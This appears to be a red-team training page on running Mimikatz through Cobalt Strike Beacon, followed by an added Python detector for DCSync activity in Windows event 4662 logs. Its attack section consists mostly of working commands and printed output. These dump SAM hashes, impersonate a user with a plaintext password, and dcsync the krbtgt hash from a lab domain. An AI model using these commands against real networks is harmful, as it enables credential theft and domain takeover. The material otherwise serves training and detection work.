Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences in how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed, so state such as an impersonated token does not carry over from one command to the next. This means you can't run two "related" commands one after the other, such as token::elevate followed by lsadump::sam.
Since CS 4.8, you can chain multiple commands together in a single execution by separating them with a semicolon.
beacon> mimikatz token::elevate ; lsadump::sam
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
552 {0;000003e7} 1 D 28330 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000d4499} 2 F 3234168 DEV\bfarmer S-1-5-21-569305411-121244042-2357301523-1104 (15g,24p) Primary
* Thread Token : {0;000003e7} 1 D 3295086 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a
Local SID : S-1-5-21-2281971671-4135076198-2136761646
SAMKey : b0664279732686cfbb4b788c078fea82
RID : 000001f4 (500)
User : Administrator
Hash NTLM: fc525c9683e8fe067095ba2ddc971889
lm - 0: 91b6e660bcac036ae7ab67a3d383bc82
ntlm- 0: fc525c9683e8fe067095ba2ddc971889
Beacon also has its own command convention using the ! and @ symbols as "modifiers".
The ! elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate. For example:
beacon> mimikatz !lsadump::sam
The @ impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync. This is also compatible with other impersonation primitives such as make_token and steal_token. For example:
beacon> getuid
[*] You are DEV\bfarmer
beacon> make_token DEV\nlamb F3rrari
[+] Impersonated DEV\nlamb (netonly)
beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 8/15/2022 4:01:04 PM
Object Security ID : S-1-5-21-569305411-121244042-2357301523-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
lm - 0: 207d5e08551c51892309c0cf652c353b
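The dcsync request above is answered by the DC over the directory replication interface, which on the DC side is audited as Security event 4662 with the replication control-access rights in the Properties field. The following is an added detection example written for this page (not Cobalt Strike, Mimikatz or Microsoft code). It assumes 4662 records arrive as one JSON object per line using the Security log's own field names (EventID, SubjectUserName, SubjectDomainName, AccessMask, Properties), that domain controllers can be recognised by their computer account names, and the sample records below are constructed, reusing the DC-2 and nlamb names from the output above.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example for this page; not Cobalt Strike or Mimikatz code.
Assumptions: one JSON object per line with Security-log field names, and a
caller-supplied set of domain controller computer accounts (e.g. "DC-2$").
"""
import json
import re

# Well-known Active Directory extended rights exercised by a replication
# (dcsync) request. Get-Changes-All is the one that returns secrets such as
# the krbtgt NTLM hash, so it is treated as the strong signal.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in AccessMask

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def parse_4662(line):
    """Return the event as a dict if it is a well-formed 4662 record, else None."""
    try:
        ev = json.loads(line)
    except json.JSONDecodeError:
        return None
    return ev if ev.get("EventID") == 4662 else None


def replication_rights_in(ev):
    """Names of the replication rights referenced in the Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def find_dcsync_events(lines, dc_accounts):
    """Return alerts for replication requests that did not come from a DC.

    Replication between domain controllers is normal and is suppressed by
    checking the subject against dc_accounts; any other principal exercising
    these rights is reported with a severity.
    """
    dc_set = {a.upper() for a in dc_accounts}
    alerts = []
    for line in lines:
        ev = parse_4662(line)
        if ev is None:
            continue
        mask = int(str(ev.get("AccessMask", "0")), 16)
        if not mask & CONTROL_ACCESS:
            continue
        rights = replication_rights_in(ev)
        if not rights:
            continue  # 4662 for some unrelated object/right
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dc_set:
            continue  # DC-to-DC replication, expected
        severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "rights": rights,
            "severity": severity,
        })
    return alerts


# Constructed sample records (not real log data): one DC-to-DC replication,
# one replication request from a user account, one unrelated 4662, one junk line.
SAMPLE_LINES = [
    json.dumps({"EventID": 4662, "SubjectUserName": "DC-2$", "SubjectDomainName": "DEV",
                "AccessMask": "0x100",
                "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}),
    json.dumps({"EventID": 4662, "SubjectUserName": "nlamb", "SubjectDomainName": "DEV",
                "AccessMask": "0x100",
                "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}),
    json.dumps({"EventID": 4662, "SubjectUserName": "bfarmer", "SubjectDomainName": "DEV",
                "AccessMask": "0x20", "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"}),
    "not json at all",
]

if __name__ == "__main__":
    for alert in find_dcsync_events(SAMPLE_LINES, dc_accounts={"DC-2$"}):
        print(alert)
```

In production the DC account list should be derived from the Domain Controllers OU rather than hard-coded, and a medium-severity hit for Get-Changes alone is worth reviewing because some legitimate products hold that right without Get-Changes-All.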